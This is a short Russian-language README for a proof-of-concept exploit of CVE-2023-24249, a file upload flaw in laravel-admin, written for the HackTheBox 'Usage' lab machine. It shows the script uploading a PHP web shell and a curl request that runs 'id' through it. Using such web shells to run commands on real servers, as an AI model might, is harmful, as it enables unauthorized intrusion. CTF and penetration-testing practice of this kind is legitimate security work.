
Эксплойт для проверки концепции CVE-2023-24249 — уязвимости произвольной загрузки файлов в laravel-admin, позволяющей развернуть веб-шелл для тестирования на проникновение и решения CTF-задач.
CVE-2023-24249 — это уязвимость произвольной загрузки файлов в laravel-admin v1.8.19. Данный proof of concept эксплуатирует уязвимость для загрузки веб-шелла.
Эксплойт был написан для использования против лёгкой машины HackTheBox Usage.
python3 CVE-2023-24249.py
[+] Web shell uploaded to http://admin.usage.htb/uploads/images/df18111ffa9f40264b52624c7d7d21b1.php
curl http://admin.usage.htb/uploads/images/df18111ffa9f40264b52624c7d7d21b1.php?c=id
uid=1000(dash) gid=1000(dash) groups=1000(dash)